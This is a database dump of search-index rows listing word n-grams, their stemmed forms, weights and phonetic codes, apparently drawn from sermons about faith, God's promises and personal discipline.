(251245, 'promise don\'t let', 'promis don let', 0, 1, 1.5667, 'P65235343', 2, '*'),
(251246, 'promises over', 'promis over', 0, 1, 1.4333, 'P65216', 2, '*'),
(251247, 'promises over your', 'promis over your', 0, 1, 1.6, 'P65216', 2, '*'),
(251248, 'put them', 'put them', 0, 1, 1.2667, 'P350', 2, '*'),
(251249, 'put them over', 'put them over', 0, 1, 1.4333, 'P3516', 2, '*'),
(251250, 'put your', 'put your', 0, 1, 1.2667, 'P360', 2, '*'),
(251251, 'put your confidence', 'put your confidence', 0, 1, 1.6333, 'P36251352', 2, '*'),
(251252, 'raise the', 'rais the', 0, 1, 1.3, 'R230', 2, '*'),
(251253, 'raise the dead', 'rais the dead', 0, 1, 1.4667, 'R230', 2, '*'),
(251254, 'reality in', 'realiti in', 0, 1, 1.3333, 'R435', 2, '*'),
(251255, 'reality in your', 'realiti in your', 0, 1, 1.5, 'R4356', 2, '*'),
(251256, 'recite', 'recit', 0, 0, 0.4, 'R230', 2, '*'),
(251257, 'recite them', 'recit them', 0, 1, 1.3667, 'R235', 2, '*'),
(251258, 'recite them declare', 'recit them declare', 0, 1, 1.6333, 'R2353246', 2, '*'),
(251259, 'reflect the', 'reflect the', 0, 1, 1.3667, 'R1423', 2, '*'),
(251260, 'reflect the release', 'reflect the release', 0, 1, 1.6333, 'R1423642', 2, '*'),
(251261, 'release of', 'releas of', 0, 1, 1.3333, 'R421', 2, '*'),
(251262, 'release of heaven', 'releas of heaven', 0, 1, 1.5667, 'R4215', 2, '*'),
(251263, 'remember what', 'rememb what', 0, 1, 1.4333, 'R5163', 2, '*'),
(251264, 'remember what god', 'rememb what god', 0, 1, 1.5667, 'R516323', 2, '*'),
(251265, 'responsibility to activate', 'respons to activate', 0, 1, 1.8667, 'R21521432313', 2, '*'),
(251266, 'reward', 'reward', 0, 0, 0.4, 'R300', 2, '*'),
(251267, 'reward till', 'reward till', 0, 1, 1.3667, 'R340', 2, '*'),
(251268, 'reward till next', 'reward till next', 0, 1, 1.5333, 'R34523', 2, '*'),
(251269, 'said he', 'said he', 0, 1, 1.2333, 'S300', 2, '*'),
(251270, 'said he would', 'said he would', 0, 1, 1.4333, 'S343', 2, '*'),
(251271, 'said to pass', 'said to pass', 0, 1, 1.4, 'S312', 2, '*'),
(251272, 'said to you', 'said to you', 0, 1, 1.3667, 'S300', 2, '*'),
(251273, 'see everything', 'see everything', 0, 1, 1.4667, 'S16352', 2, '*'),
(251274, 'see everything become', 'see everything become', 0, 1, 1.7, 'S16352125', 2, '*'),
(251275, 'seem', 'seem', 0, 0, 0.2667, 'S500', 2, '*'),
(251276, 'seem unfavourable', 'seem unfavourable', 0, 1, 1.5667, 'S51614', 2, '*'),
(251277, 'seem unfavourable never', 'seem unfavourable never', 0, 1, 1.7667, 'S51614516', 2, '*'),
(251278, 'should daily', 'should daily', 0, 1, 1.4, 'S434', 2, '*'),
(251279, 'should daily confess', 'should daily confess', 0, 1, 1.6667, 'S4342512', 2, '*'),
(251280, 'situations and circumstances', 'situat and circumstances', 0, 1, 1.9333, 'S3525326252352', 2, '*'),
(251281, 'slaughtered', 'slaughter', 0, 0, 0.7333, 'S42363', 2, '*'),
(251282, 'slaughtered abraham', 'slaughter abraham', 0, 1, 1.6333, 'S42363165', 2, '*'),
(251283, 'slaughtered abraham confidently', 'slaughter abraham confidently', 0, 1, 2, 'S423631652513534', 2, '*'),
(251284, 'son even', 'son even', 0, 1, 1.2667, 'S515', 2, '*'),
(251285, 'son even when', 'son even when', 0, 1, 1.4333, 'S515', 2, '*'),
(251286, 'spoken a', 'spoken a', 0, 1, 1.2667, 'S125', 2, '*'),
(251287, 'spoken a lot', 'spoken a lot', 0, 1, 1.4, 'S12543', 2, '*'),
(251288, 'stay and', 'stai and', 0, 1, 1.2667, 'S353', 2, '*'),
(251289, 'stay and grow', 'stai and grow', 0, 1, 1.4333, 'S35326', 2, '*'),
(251290, 'stay in god', 'stai in god', 0, 1, 1.3667, 'S3523', 2, '*'),
(251291, 'stood with', 'stood with', 0, 1, 1.3333, 'S300', 2, '*'),
(251292, 'stood with his', 'stood with his', 0, 1, 1.4667, 'S320', 2, '*'),
(251293, 'take it anymore', 'take it anymore', 0, 1, 1.5, 'T2356', 2, '*'),
(251294, 'that god was', 'that god was', 0, 1, 1.4, 'T232', 2, '*'),
(251295, 'that is your', 'that is your', 0, 1, 1.4, 'T260', 2, '*'),
(251296, 'that word', 'that word', 0, 1, 1.3, 'T630', 2, '*'),
(251297, 'that word god', 'that word god', 0, 1, 1.4333, 'T6323', 2, '*'),
(251298, 'that\'s when', 'that when', 0, 1, 1.3667, 'T250', 2, '*'),
(251299, 'that\'s when the', 'that when the', 0, 1, 1.5, 'T253', 2, '*'),
(251300, 'the covenants', 'the covenants', 0, 1, 1.4333, 'T21532', 2, '*'),
(251301, 'the covenants that', 'the covenants that', 0, 1, 1.6, 'T215323', 2, '*'),
(251302, 'the dead and', 'the dead and', 0, 1, 1.4, 'T530', 2, '*'),
(251303, 'the future is', 'the future is', 0, 1, 1.4333, 'T1362', 2, '*'),
(251304, 'the future will', 'the future will', 0, 1, 1.5, 'T1364', 2, '*'),
(251305, 'the immutability', 'the immutability', 0, 1, 1.5333, 'T53143', 2, '*'),
(251306, 'the immutability of', 'the immutability of', 0, 1, 1.6333, 'T531431', 2, '*'),
(251307, 'the life god', 'the life god', 0, 1, 1.4, 'T4123', 2, '*'),
(251308, 'the lord die', 'the lord die', 0, 1, 1.4, 'T463', 2, '*'),
(251309, 'the mountain', 'the mountain', 0, 1, 1.4, 'T535', 2, '*'),
(251310, 'the mountain believing', 'the mountain believing', 0, 1, 1.7333, 'T53514152', 2, '*'),
(251311, 'the release', 'the release', 0, 1, 1.3667, 'T642', 2, '*'),
(251312, 'the release of', 'the release of', 0, 1, 1.4667, 'T6421', 2, '*'),
(251313, 'the years', 'the years', 0, 1, 1.3, 'T620', 2, '*'),
(251314, 'the years and', 'the years and', 0, 1, 1.4333, 'T6253', 2, '*'),
(251315, 'them declare', 'them declare', 0, 1, 1.4, 'T53246', 2, '*'),
(251316, 'them declare them', 'them declare them', 0, 1, 1.5667, 'T5324635', 2, '*'),
(251317, 'them over', 'them over', 0, 1, 1.3, 'T516', 3, '*'),
(251318, 'them over yourself', 'them over yourself', 0, 1, 1.6, 'T516241', 2, '*'),
(251319, 'them pray', 'them pray', 0, 1, 1.3, 'T516', 2, '*'),
(251320, 'them pray all', 'them pray all', 0, 1, 1.4333, 'T5164', 2, '*'),
(251321, 'them recite', 'them recite', 0, 1, 1.3667, 'T5623', 2, '*'),
(251322, 'them recite them', 'them recite them', 0, 1, 1.5333, 'T56235', 2, '*'),
(251323, 'then put', 'then put', 0, 1, 1.2667, 'T513', 2, '*'),
(251324, 'then put your', 'then put your', 0, 1, 1.4333, 'T5136', 2, '*'),
(251325, 'therefore do', 'therefor do', 0, 1, 1.4, 'T6163', 2, '*'),
(251326, 'therefore do not', 'therefor do not', 0, 1, 1.5333, 'T616353', 2, '*'),
(251327, 'these words', 'these words', 0, 1, 1.3667, 'T2632', 2, '*'),
(251328, 'these words and', 'these words and', 0, 1, 1.5, 'T263253', 2, '*'),
(251329, 'things don\'t', 'thing don', 0, 1, 1.4, 'T52353', 2, '*'),
(251330, 'things don\'t even', 'thing don even', 0, 1, 1.5667, 'T5235315', 2, '*'),
(251331, 'this will determine', 'thi will determine', 0, 1, 1.6333, 'T24365', 2, '*'),
(251332, 'those covenants', 'those covenants', 0, 1, 1.5, 'T21532', 2, '*'),
(251333, 'those covenants and', 'those covenants and', 0, 1, 1.6333, 'T2153253', 2, '*'),
(251334, 'those prayer', 'those prayer', 0, 1, 1.4, 'T216', 2, '*'),
(251335, 'those prayer points', 'those prayer points', 0, 1, 1.6333, 'T2161532', 2, '*'),
(251336, 'those words but', 'those words but', 0, 1, 1.5, 'T263213', 2, '*'),
(251337, 'those words over', 'those words over', 0, 1, 1.5333, 'T263216', 2, '*'),
(251338, 'those words reflect', 'those words reflect', 0, 1, 1.6333, 'T263261423', 2, '*'),
(251339, 'through his word', 'through his word', 0, 1, 1.5333, 'T6263', 2, '*'),
(251340, 'through tough', 'through tough', 0, 1, 1.4333, 'T6232', 2, '*'),
(251341, 'through tough times', 'through tough times', 0, 1, 1.6333, 'T6232352', 2, '*'),
(251342, 'times let', 'time let', 0, 1, 1.3, 'T5243', 2, '*'),
(251343, 'times let your', 'time let your', 0, 1, 1.4667, 'T52436', 2, '*'),
(251344, 'to be slaughtered', 'to be slaughtered', 0, 1, 1.5667, 'T1242363', 2, '*'),
(251345, 'to break', 'to break', 0, 1, 1.2667, 'T162', 3, '*'),
(251346, 'to break that\'s', 'to break that', 0, 1, 1.5, 'T16232', 2, '*'),
(251347, 'to bringing', 'to bringing', 0, 1, 1.3667, 'T165252', 2, '*'),
(251348, 'to bringing what', 'to bringing what', 0, 1, 1.5333, 'T1652523', 2, '*'),
(251349, 'to give him', 'to give him', 0, 1, 1.3667, 'T215', 2, '*'),
(251350, 'to pass don\'t', 'to pass don', 0, 1, 1.4333, 'T12353', 2, '*'),
(251351, 'to raise the', 'to raise the', 0, 1, 1.4, 'T623', 2, '*'),
(251352, 'to the life', 'to the life', 0, 1, 1.3667, 'T410', 2, '*'),
(251353, 'to the mountain', 'to the mountain', 0, 1, 1.5, 'T535', 2, '*'),
(251354, 'to us as', 'to us as', 0, 1, 1.2667, 'T200', 2, '*'),
(251355, 'to us over', 'to us over', 0, 1, 1.3333, 'T216', 2, '*'),
(251356, 'to you personally', 'to you personally', 0, 1, 1.5667, 'T16254', 2, '*'),
(251357, 'tough times', 'tough times', 0, 1, 1.3667, 'T2352', 2, '*'),
(251358, 'tough times let', 'tough times let', 0, 1, 1.5, 'T235243', 2, '*'),
(251359, 'trust in the', 'trust in the', 0, 1, 1.4, 'T62353', 2, '*'),
(251360, 'try to make', 'try to make', 0, 1, 1.3667, 'T6352', 2, '*'),
(251361, 'unfavourable', 'unfavour', 0, 0, 0.8, 'U51614', 2, '*'),
(251362, 'unfavourable never', 'unfavour never', 0, 1, 1.6, 'U51614516', 2, '*'),
(251363, 'unfavourable never let', 'unfavour never let', 0, 1, 1.7333, 'U5161451643', 2, '*'),
(251364, 'unwavering', 'unwav', 0, 0, 0.6667, 'U51652', 2, '*'),
(251365, 'unwavering in', 'unwav in', 0, 1, 1.4333, 'U516525', 2, '*'),
(251366, 'unwavering in god', 'unwav in god', 0, 1, 1.5667, 'U51652523', 2, '*'),
(251367, 'us already', 'us already', 0, 1, 1.3333, 'U2463', 2, '*'),
(251368, 'us already but', 'us already but', 0, 1, 1.4667, 'U246313', 2, '*'),
(251369, 'us as a', 'us as a', 0, 1, 1.2333, 'U200', 2, '*'),
(251370, 'us get', 'us get', 0, 1, 1.2, 'U230', 2, '*'),
(251371, 'us get all', 'us get all', 0, 1, 1.3333, 'U234', 2, '*'),
(251372, 'us over', 'us over', 0, 1, 1.2333, 'U216', 2, '*'),
(251373, 'us over the', 'us over the', 0, 1, 1.3667, 'U2163', 2, '*'),
(251374, 'us the devil', 'us the devil', 0, 1, 1.4, 'U2314', 2, '*'),
(251375, 'wave', 'wave', 0, 0, 0.2667, 'W100', 2, '*'),
(251376, 'we journey', 'we journey', 0, 1, 1.3333, 'W265', 2, '*'),
(251377, 'we journey on', 'we journey on', 0, 1, 1.4333, 'W265', 2, '*'),
(251378, 'went to', 'went to', 0, 1, 1.2333, 'W530', 2, '*'),
(251379, 'went to the', 'went to the', 0, 1, 1.3667, 'W530', 2, '*'),
(251380, 'what happens even', 'what happens even', 0, 1, 1.5667, 'W315215', 2, '*'),
(251381, 'what he said', 'what he said', 0, 1, 1.4, 'W323', 2, '*'),
(251382, 'when day', 'when day', 0, 1, 1.2667, 'W530', 2, '*'),
(251383, 'when day is', 'when day is', 0, 1, 1.3667, 'W532', 2, '*'),
(251384, 'when god demanded', 'when god demanded', 0, 1, 1.5667, 'W52353', 2, '*'),
(251385, 'when it looks', 'when it looks', 0, 1, 1.4333, 'W5342', 2, '*'),
(251386, 'when the night', 'when the night', 0, 1, 1.4667, 'W53523', 2, '*'),
(251387, 'which has', 'which has', 0, 1, 1.3, 'W200', 2, '*'),
(251388, 'which has great', 'which has great', 0, 1, 1.5, 'W263', 2, '*'),
(251389, 'which seem', 'which seem', 0, 1, 1.3333, 'W250', 2, '*'),
(251390, 'which seem unfavourable', 'which seem unfavourable', 0, 1, 1.7667, 'W251614', 2, '*'),
(251391, 'will be for', 'will be for', 0, 1, 1.3667, 'W416', 2, '*'),
(251392, 'will determine how', 'will determine how', 0, 1, 1.6, 'W4365', 2, '*'),
(251393, 'will see everything', 'will see everything', 0, 1, 1.6333, 'W4216352', 2, '*'),
(251394, 'will try', 'will try', 0, 1, 1.2667, 'W436', 2, '*'),
(251395, 'will try to', 'will try to', 0, 1, 1.3667, 'W4363', 2, '*'),
(251396, 'with his confidence', 'with his confidence', 0, 1, 1.6333, 'W3251352', 2, '*'),
(251397, 'with the covenants', 'with the covenants', 0, 1, 1.6, 'W321532', 2, '*'),
(251398, 'with us the', 'with us the', 0, 1, 1.3667, 'W323', 2, '*'),
(251399, 'with your prophecies', 'with your prophecies', 0, 1, 1.6667, 'W361612', 2, '*'),
(251400, 'word and ability', 'word and ability', 0, 1, 1.5333, 'W6353143', 2, '*'),
(251401, 'word and to', 'word and to', 0, 1, 1.3667, 'W6353', 2, '*'),
(251402, 'word be', 'word be', 0, 1, 1.2333, 'W631', 2, '*'),
(251403, 'word be patient', 'word be patient', 0, 1, 1.5, 'W631353', 2, '*'),
(251404, 'word god', 'word god', 0, 1, 1.2667, 'W6323', 2, '*'),
(251405, 'word god is', 'word god is', 0, 1, 1.3667, 'W63232', 2, '*'),
(251406, 'words align', 'word align', 0, 1, 1.3667, 'W632425', 2, '*'),
(251407, 'words align with', 'word align with', 0, 1, 1.5333, 'W6324253', 2, '*'),
(251408, 'words and', 'word and', 0, 1, 1.3, 'W63253', 2, '*'),
(251409, 'words and put', 'word and put', 0, 1, 1.4333, 'W6325313', 2, '*'),
(251410, 'words but you', 'word but you', 0, 1, 1.4333, 'W63213', 2, '*'),
(251411, 'words over', 'word over', 0, 1, 1.3333, 'W63216', 2, '*'),
(251412, 'words over yourself', 'word over yourself', 0, 1, 1.6333, 'W63216241', 2, '*'),
(251413, 'words reflect', 'word reflect', 0, 1, 1.4333, 'W63261423', 2, '*'),
(251414, 'words reflect the', 'word reflect the', 0, 1, 1.5667, 'W63261423', 2, '*'),
(251415, 'work hebrews', 'work hebrews', 0, 1, 1.4, 'W62162', 2, '*'),
(251416, 'work hebrews 10', 'work hebrews 10', 0, 1, 1.5, 'W62162', 2, '*'),
(251417, 'would do', 'would do', 0, 1, 1.2667, 'W430', 2, '*'),
(251418, 'would do even', 'would do even', 0, 1, 1.4333, 'W4315', 2, '*'),
(251419, 'years and those', 'year and those', 0, 1, 1.5, 'Y62532', 2, '*'),
(251420, 'you are hard', 'you are hard', 0, 1, 1.4, 'Y630', 2, '*'),
(251421, 'you cancel', 'you cancel', 0, 1, 1.3333, 'Y2524', 2, '*'),
(251422, 'you cancel all', 'you cancel all', 0, 1, 1.4667, 'Y2524', 2, '*'),
(251423, 'you in life', 'you in life', 0, 1, 1.3667, 'Y541', 2, '*'),
(251424, 'you must align', 'you must align', 0, 1, 1.4667, 'Y523425', 2, '*'),
(251425, 'you personally through', 'you personally through', 0, 1, 1.7333, 'Y16254362', 2, '*'),
(251426, 'you should daily', 'you should daily', 0, 1, 1.5333, 'Y2434', 2, '*'),
(251427, 'your confidence stay', 'your confidence stay', 0, 1, 1.6667, 'Y62513523', 2, '*'),
(251428, 'your confidence which', 'your confidence which', 0, 1, 1.7, 'Y6251352', 2, '*'),
(251429, 'your family you', 'your family you', 0, 1, 1.5, 'Y6154', 2, '*'),
(251430, 'your heart stay', 'your heart stay', 0, 1, 1.5, 'Y6323', 2, '*'),
(251431, 'your key', 'your key', 0, 1, 1.2667, 'Y620', 2, '*'),
(251432, 'your key to', 'your key to', 0, 1, 1.3667, 'Y623', 2, '*'),
(251433, 'your life let', 'your life let', 0, 1, 1.4333, 'Y64143', 3, '*'),
(251434, 'your mouth with', 'your mouth with', 0, 1, 1.5, 'Y653', 2, '*'),
(251435, 'your prophecies', 'your prophecies', 0, 1, 1.5, 'Y61612', 2, '*'),
(251436, 'your prophecies that', 'your prophecies that', 0, 1, 1.6667, 'Y616123', 2, '*'),
(251437, 'your trust', 'your trust', 0, 1, 1.3333, 'Y63623', 2, '*'),
(251438, 'your trust in', 'your trust in', 0, 1, 1.4333, 'Y636235', 2, '*'),
(251439, 'your words align', 'your words align', 0, 1, 1.5333, 'Y632425', 2, '*'),
(251440, 'yourself and your', 'yourself and your', 0, 1, 1.5667, 'Y6241536', 2, '*'),
(251441, 'yourself every', 'yourself every', 0, 1, 1.4667, 'Y62416', 2, '*'),
(251442, 'yourself every day', 'yourself every day', 0, 1, 1.6, 'Y624163', 2, '*'),
(251443, 'yourself just', 'yourself just', 0, 1, 1.4333, 'Y624123', 2, '*'),
(251444, 'yourself just let', 'yourself just let', 0, 1, 1.5667, 'Y62412343', 2, '*'),
(252983, 'a disaster', 'a disaster', 0, 1, 1.3333, 'A3236', 2, '*'),
(252984, 'a disaster going', 'a disaster going', 0, 1, 1.5333, 'A3236252', 2, '*'),
(252985, 'a disciplined', 'a disciplined', 0, 1, 1.4333, 'A321453', 2, '*'),
(252986, 'a disciplined man', 'a disciplined man', 0, 1, 1.5667, 'A3214535', 2, '*'),
(252987, 'a piece', 'a piece', 0, 1, 1.2333, 'A120', 2, '*'),
(252989, 'accept it', 'accept it', 0, 1, 1.3, 'A213', 2, '*'),
(252990, 'accept it the', 'accept it the', 0, 1, 1.4333, 'A213', 2, '*'),
(252991, 'accepted discipleship', 'accept discipleship', 0, 1, 1.7, 'A21321421', 2, '*'),
(252992, 'accepted discipleship that', 'accept discipleship that', 0, 1, 1.8667, 'A213214213', 2, '*'),
(252993, 'accepting', 'accept', 0, 0, 0.6, 'A21352', 2, '*'),
(252996, 'adjusting', 'adjust', 0, 0, 0.6, 'A32352', 2, '*'),
(252997, 'adjusting inside', 'adjust inside', 0, 1, 1.5333, 'A32352523', 2, '*'),
(252998, 'adjusting inside to', 'adjust inside to', 0, 1, 1.6333, 'A32352523', 2, '*'),
(252999, 'affairs causing', 'affair causing', 0, 1, 1.5, 'A16252', 2, '*'),
(253000, 'affairs causing disorder', 'affair causing disorder', 0, 1, 1.8, 'A1625232636', 2, '*'),
(253001, 'affects your', 'affect your', 0, 1, 1.4, 'A12326', 2, '*'),
(253002, 'affects your decisions', 'affect your decisions', 0, 1, 1.7333, 'A123263252', 2, '*'),
(253003, 'again they', 'again they', 0, 1, 1.3333, 'A253', 2, '*'),
(253004, 'again they find', 'again they find', 0, 1, 1.5, 'A253153', 2, '*'),
(253005, 'align your life', 'align your life', 0, 1, 1.5, 'A425641', 2, '*'),
(253006, 'all but', 'all but', 0, 1, 1.2333, 'A413', 2, '*'),
(253007, 'all but they', 'all but they', 0, 1, 1.4, 'A413', 2, '*'),
(253008, 'also brings', 'also brings', 0, 1, 1.3667, 'A421652', 2, '*'),
(253009, 'also brings dignity', 'also brings dignity', 0, 1, 1.6333, 'A4216523253', 2, '*'),
(253010, 'always be at', 'alwai be at', 0, 1, 1.4, 'A4213', 2, '*'),
(253011, 'always suffer', 'alwai suffer', 0, 1, 1.4333, 'A4216', 2, '*'),
(253012, 'always suffer panic', 'alwai suffer panic', 0, 1, 1.6333, 'A4216152', 2, '*'),
(253013, 'an undisciplined', 'an undisciplined', 0, 1, 1.5333, 'A5321453', 2, '*'),
(253014, 'an undisciplined man', 'an undisciplined man', 0, 1, 1.6667, 'A53214535', 2, '*'),
(253015, 'and affairs', 'and affairs', 0, 1, 1.3667, 'A53162', 2, '*'),
(253016, 'and affairs causing', 'and affairs causing', 0, 1, 1.6333, 'A5316252', 2, '*'),
(253017, 'and affects', 'and affects', 0, 1, 1.3667, 'A531232', 2, '*'),
(253018, 'and affects your', 'and affects your', 0, 1, 1.5333, 'A5312326', 2, '*'),
(253019, 'and align', 'and align', 0, 1, 1.3, 'A53425', 2, '*'),
(253020, 'and align your', 'and align your', 0, 1, 1.4667, 'A534256', 2, '*'),
(253021, 'and appetites', 'and appetites', 0, 1, 1.4333, 'A53132', 2, '*'),
(253022, 'and appetites so', 'and appetites so', 0, 1, 1.5333, 'A53132', 2, '*'),
(253023, 'and behaviour', 'and behaviour', 0, 1, 1.4333, 'A5316', 2, '*'),
(253024, 'and behaviour in', 'and behaviour in', 0, 1, 1.5333, 'A53165', 2, '*'),
(253025, 'and chaos', 'and chaos', 0, 1, 1.3, 'A532', 2, '*'),
(253026, 'and chaos undisciplined', 'and chaos undisciplined', 0, 1, 1.7667, 'A5325321453', 2, '*'),
(253027, 'and desires', 'and desires', 0, 1, 1.3667, 'A53262', 2, '*'),
(253028, 'and desires beloved', 'and desires beloved', 0, 1, 1.6333, 'A532621413', 2, '*'),
(253029, 'and destiny discipline', 'and destiny discipline', 0, 1, 1.7333, 'A5323532145', 2, '*'),
(253030, 'and energy', 'and energy', 0, 1, 1.3333, 'A53562', 2, '*'),
(253031, 'and energy indiscipline', 'and energy indiscipline', 0, 1, 1.7667, 'A53562532145', 2, '*'),
(253032, 'and family', 'and family', 0, 1, 1.3333, 'A53154', 3, '*'),
(253033, 'and family of', 'and family of', 0, 1, 1.4333, 'A531541', 2, '*'),
(253034, 'and for the', 'and for the', 0, 1, 1.3667, 'A53163', 2, '*'),
(253035, 'and have internalised', 'and have internalised', 0, 1, 1.7, 'A5315365423', 2, '*'),
(253036, 'and honour', 'and honour', 0, 1, 1.3333, 'A5356', 3, '*'),
(253037, 'and honour into', 'and honour into', 0, 1, 1.5, 'A535653', 3, '*'),
(253038, 'and issues', 'and issues', 0, 1, 1.3333, 'A532', 2, '*'),
(253039, 'and issues discipline', 'and issues discipline', 0, 1, 1.7, 'A53232145', 2, '*'),
(253040, 'and makes', 'and makes', 0, 1, 1.3, 'A5352', 2, '*'),
(253041, 'and makes you', 'and makes you', 0, 1, 1.4333, 'A5352', 2, '*'),
(253042, 'and open to', 'and open to', 0, 1, 1.3667, 'A53153', 2, '*'),
(253043, 'and over', 'and over', 0, 1, 1.2667, 'A5316', 3, '*'),
(253044, 'and over again', 'and over again', 0, 1, 1.4667, 'A531625', 2, '*'),
(253045, 'and reproach', 'and reproach', 0, 1, 1.4, 'A536162', 2, '*'),
(253046, 'and reproach accepting', 'and reproach accepting', 0, 1, 1.7333, 'A5361621352', 2, '*'),
(253047, 'and they eventually', 'and they eventually', 0, 1, 1.6333, 'A531534', 2, '*'),
(253048, 'angels from', 'angel from', 0, 1, 1.3667, 'A5242165', 2, '*'),
(253049, 'angels from working', 'angel from working', 0, 1, 1.6333, 'A52421656252', 2, '*'),
(253050, 'appetites', 'appetit', 0, 0, 0.6, 'A132', 2, '*'),
(253051, 'appetites and', 'appetit and', 0, 1, 1.4333, 'A13253', 2, '*'),
(253052, 'appetites and desires', 'appetit and desires', 0, 1, 1.7, 'A13253262', 2, '*'),
(253053, 'appetites so', 'appetit so', 0, 1, 1.4, 'A132', 2, '*'),
(253054, 'appetites so that', 'appetit so that', 0, 1, 1.5667, 'A1323', 2, '*'),
(253055, 'are difficult', 'ar difficult', 0, 1, 1.4333, 'A631243', 2, '*'),
(253056, 'are difficult to', 'ar difficult to', 0, 1, 1.5333, 'A631243', 2, '*'),
(253057, 'are disciplined', 'ar disciplined', 0, 1, 1.5, 'A6321453', 2, '*'),
(253058, 'are disciplined they', 'ar disciplined they', 0, 1, 1.6667, 'A6321453', 2, '*'),
(253059, 'are great', 'ar great', 0, 1, 1.3, 'A6263', 2, '*'),
(253060, 'are great benefits', 'ar great benefits', 0, 1, 1.6, 'A626315132', 2, '*'),
(253061, 'are respected', 'ar respected', 0, 1, 1.4333, 'A62123', 2, '*'),
(253062, 'are respected indiscipline', 'ar respected indiscipline', 0, 1, 1.8667, 'A62123532145', 2, '*'),
(253063, 'as you embrace', 'as you embrace', 0, 1, 1.4667, 'A25162', 2, '*'),
(253064, 'at every', 'at every', 0, 1, 1.2667, 'A316', 2, '*'),
(253065, 'at every cheap', 'at every cheap', 0, 1, 1.4667, 'A31621', 2, '*'),
(253066, 'at rest', 'at rest', 0, 1, 1.2333, 'A3623', 2, '*'),
(253067, 'at rest that\'s', 'at rest that', 0, 1, 1.4667, 'A36232', 2, '*'),
(253068, 'attacks while', 'attack while', 0, 1, 1.4333, 'A324', 2, '*'),
(253069, 'attacks while the', 'attack while the', 0, 1, 1.5667, 'A3243', 2, '*'),
(253070, 'be at rest', 'be at rest', 0, 1, 1.3333, 'B3623', 2, '*'),
(253071, 'be disciplined', 'be disciplined', 0, 1, 1.4667, 'B321453', 2, '*'),
(253072, 'be disciplined means', 'be disciplined means', 0, 1, 1.6667, 'B32145352', 2, '*'),
(253073, 'be fit', 'be fit', 0, 1, 1.2, 'B300', 2, '*'),
(253074, 'be fit for', 'be fit for', 0, 1, 1.3333, 'B316', 2, '*'),
(253075, 'be loved', 'be loved', 0, 1, 1.2667, 'B413', 2, '*'),
(253076, 'be loved by', 'be loved by', 0, 1, 1.3667, 'B4131', 2, '*'),
(253077, 'be the easiest', 'be the easiest', 0, 1, 1.4667, 'B323', 2, '*'),
(253078, 'because of indiscipline', 'becaus of indiscipline', 0, 1, 1.7667, 'B21532145', 2, '*'),
(253079, 'become victims', 'becom victims', 0, 1, 1.4667, 'B2512352', 2, '*'),
(253080, 'become victims of', 'becom victims of', 0, 1, 1.5667, 'B25123521', 2, '*'),
(253081, 'becomes porous', 'becom porous', 0, 1, 1.4667, 'B252162', 2, '*'),
(253082, 'becomes porous and', 'becom porous and', 0, 1, 1.6, 'B25216253', 2, '*'),
(253083, 'behaviour in', 'behaviour in', 0, 1, 1.4, 'B650', 2, '*'),
(253084, 'behaviour in you', 'behaviour in you', 0, 1, 1.5333, 'B650', 2, '*'),
(253085, 'beloved you don\'t', 'belov you don', 0, 1, 1.5667, 'B41353', 2, '*'),
(253086, 'benefits', 'benefit', 0, 0, 0.5333, 'B5132', 2, '*'),
(253087, 'benefits when', 'benefit when', 0, 1, 1.4333, 'B51325', 2, '*'),
(253088, 'benefits when you', 'benefit when you', 0, 1, 1.5667, 'B51325', 2, '*'),
(253089, 'birth he', 'birth he', 0, 1, 1.2667, 'B630', 2, '*'),
(253090, 'birth he had', 'birth he had', 0, 1, 1.4, 'B630', 2, '*'),
(253091, 'birthright', 'birthright', 0, 0, 0.6667, 'B63623', 2, '*'),
(253092, 'birthright but', 'birthright but', 0, 1, 1.4667, 'B6362313', 2, '*'),
(253093, 'birthright but he', 'birthright but he', 0, 1, 1.5667, 'B6362313', 2, '*'),
(253094, 'blessings to come', 'bless to come', 0, 1, 1.5667, 'B4252325', 2, '*'),
(253095, 'body desires', 'bodi desires', 0, 1, 1.4, 'B3262', 2, '*'),
(253096, 'body desires emotions', 'bodi desires emotions', 0, 1, 1.7, 'B32625352', 2, '*'),
(253099, 'brings dignity', 'bring dignity', 0, 1, 1.4667, 'B6523253', 2, '*'),
(253100, 'brings dignity respect', 'bring dignity respect', 0, 1, 1.7333, 'B652325362123', 2, '*'),
(253101, 'brings divine', 'bring divine', 0, 1, 1.4333, 'B652315', 2, '*'),
(253102, 'brings divine order', 'bring divine order', 0, 1, 1.6333, 'B652315636', 2, '*'),
(253103, 'brother', 'brother', 0, 0, 0.4667, 'B636', 2, '*'),
(253104, 'brother because', 'brother because', 0, 1, 1.5, 'B63612', 2, '*'),
(253105, 'brother because of', 'brother because of', 0, 1, 1.6, 'B636121', 2, '*'),
(253106, 'but he could', 'but he could', 0, 1, 1.4, 'B3243', 2, '*'),
(253107, 'but there', 'but there', 0, 1, 1.3, 'B360', 2, '*'),
(253108, 'but there are', 'but there are', 0, 1, 1.4333, 'B360', 2, '*'),
(253109, 'by all', 'by all', 0, 1, 1.2, 'B400', 2, '*'),
(253110, 'by all but', 'by all but', 0, 1, 1.3333, 'B413', 2, '*'),
(253111, 'by birth', 'by birth', 0, 1, 1.2667, 'B630', 2, '*'),
(253112, 'by birth he', 'by birth he', 0, 1, 1.3667, 'B630', 2, '*'),
(253113, 'can be fit', 'can be fit', 0, 1, 1.3333, 'C513', 2, '*'),
(253114, 'can reduce', 'can reduce', 0, 1, 1.3333, 'C5632', 2, '*'),
(253115, 'can reduce a', 'can reduce a', 0, 1, 1.4, 'C5632', 2, '*'),
(253116, 'carelessness', 'careless', 0, 0, 0.8, 'C64252', 2, '*'),
(253117, 'carelessness indiscipline', 'careless indiscipline', 0, 1, 1.8333, 'C64252532145', 2, '*'),
(253118, 'carelessness indiscipline hinders', 'careless indiscipline hinders', 0, 1, 2, 'C64252532145362', 2, '*'),
(253119, 'causing', 'caus', 0, 0, 0.4667, 'C520', 2, '*'),
(253120, 'causing disorder', 'caus disorder', 0, 1, 1.5333, 'C5232636', 2, '*'),
(253121, 'causing disorder and', 'caus disorder and', 0, 1, 1.6667, 'C523263653', 2, '*'),
(253122, 'centre is a', 'centr is a', 0, 1, 1.3667, 'C5362', 2, '*'),
(253123, 'centre we', 'centr we', 0, 1, 1.3, 'C536', 2, '*'),
(253124, 'centre we take', 'centr we take', 0, 1, 1.4667, 'C53632', 2, '*'),
(253125, 'chaos', 'chao', 0, 0, 0.3333, 'C000', 2, '*'),
(253126, 'chaos undisciplined', 'chao undisciplined', 0, 1, 1.6333, 'C5321453', 2, '*'),
(253127, 'chaos undisciplined church', 'chao undisciplined church', 0, 1, 1.8667, 'C5321453262', 2, '*'),
(253128, 'character and behaviour', 'charact and behaviour', 0, 1, 1.7667, 'C62365316', 2, '*'),
